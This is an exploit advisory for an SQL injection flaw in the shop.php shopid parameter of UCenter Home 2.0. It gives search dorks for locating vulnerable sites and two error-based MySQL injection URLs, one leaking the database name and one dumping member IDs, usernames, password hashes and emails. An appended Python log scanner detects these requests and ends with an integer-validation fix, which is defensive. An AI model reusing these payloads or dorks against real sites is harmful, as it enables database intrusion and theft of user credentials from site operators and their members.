__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim's database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
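
A defender-side check for the request shape shown above, as an added example that is not part of the original advisory: it scans web access logs for shop.php requests whose shopid is not a plain integer and tags the markers of the error-based technique (floor(rand(, group by, information_schema, concat(). The log lines, the combined log format and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /Shop.php?ac=view&shopid=253%27 HTTP/1.1" 200 790',
    '192.0.2.44 - - [01/Jan/2024:10:00:12 +0000] "GET /space.php?uid=1 HTTP/1.1" 200 3300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markers of the MySQL error-based (duplicate group key) technique in the advisory.
INDICATORS = {
    "rand-floor": re.compile(r"floor\s*\(\s*rand\s*\("),
    "group-by": re.compile(r"group\s+by"),
    "information_schema": re.compile(r"information_schema"),
    "concat": re.compile(r"concat\s*\("),
}

def classify_shopid(value):
    """Return [] for a plain integer id, else the reasons the value is suspect."""
    if re.fullmatch(r"\d{1,10}", value):
        return []
    # Lowercase and drop inline SQL comments so /**/ padding does not hide markers.
    text = re.sub(r"/\*.*?\*/", " ", value.lower())
    return ["non-numeric"] + [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan(lines):
    """Return (line_number, reasons) for each suspicious shop.php request."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/shop.php"):
            continue
        # parse_qs percent-decodes the value, so %20 and %27 are seen as space and quote.
        for value in parse_qs(url.query, keep_blank_values=True).get("shopid", []):
            reasons = classify_shopid(value)
            if reasons:
                findings.append((lineno, reasons))
    return findings

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(reasons)}")
```

The same integer-only rule applied server-side, before shopid reaches the query, removes the injection point rather than only detecting its use.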